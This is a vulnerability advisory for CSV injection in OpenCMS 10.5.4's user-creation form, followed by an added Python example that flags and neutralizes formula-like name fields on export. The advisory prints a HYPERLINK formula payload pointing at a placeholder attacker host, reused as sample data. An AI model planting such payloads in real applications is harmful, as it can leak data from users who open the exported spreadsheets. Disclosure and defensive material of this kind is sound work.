OpenCMS 10.5.4 CSV Injection

2019-05-10T00:00:00
ID PACKETSTORM:152827
Type packetstorm
Reporter Pramod Rana
Modified 2019-05-10T00:00:00

Description

OpenCMS v10.5.4 and earlier are vulnerable to CSV injection in the New User module through the First Name and Last Name parameters.

Impacted URL:
http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp

Payload used:
'=HYPERLINK("http://[attacker_ip:port]/GiveMeSomeData","IAmSafe")'

Further details are available here:
https://github.com/alkacon/opencms-core/issues/636

Already requested for CVE, yet to receive it.
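CSV injection takes effect when stored values such as these name fields are later written to a CSV file and opened in a spreadsheet. The following is an added example, not code from OpenCMS or the reporter: it audits stored name fields for formula-like values and neutralizes every cell on export. The function names, the export layout and the sample accounts are assumptions made for illustration.

```python
import csv
import io

# Leading characters that make spreadsheet applications evaluate a cell
# as a formula (the set listed in OWASP's CSV injection guidance).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value: str) -> bool:
    """True if a spreadsheet may evaluate this cell instead of displaying it."""
    # Some importers skip leading spaces, so look past them.
    return value.lstrip(" ").startswith(FORMULA_TRIGGERS)


def neutralize_cell(value: str) -> str:
    """Prefix formula-like cells with an apostrophe so they render as text."""
    return "'" + value if is_formula_like(value) else value


def export_users(rows) -> str:
    """Hypothetical export: (login, first name, last name) rows to CSV text."""
    out = io.StringIO()
    # QUOTE_ALL wraps every field in double quotes and doubles embedded quotes.
    writer = csv.writer(out, quoting=csv.QUOTE_ALL)
    writer.writerow(["login", "firstname", "lastname"])
    for row in rows:
        writer.writerow([neutralize_cell(str(cell)) for cell in row])
    return out.getvalue()


def audit_users(rows) -> list:
    """Logins whose stored name fields would be evaluated as formulas."""
    return [r[0] for r in rows if any(is_formula_like(str(c)) for c in r[1:])]


# Constructed sample accounts; "mallory" carries the payload from the advisory.
SAMPLE_USERS = [
    ("alice", "Alice", "Smith"),
    ("mallory",
     '=HYPERLINK("http://[attacker_ip:port]/GiveMeSomeData","IAmSafe")', "Doe"),
    ("bob", " +Bob", "O'Neil"),
]

if __name__ == "__main__":
    print("flagged accounts:", audit_users(SAMPLE_USERS))
    print(export_users(SAMPLE_USERS))
```

The same check applied at input time in the user-creation form would also flag legitimate values that begin with `-` or `+`, so neutralizing at export is the less disruptive place for it.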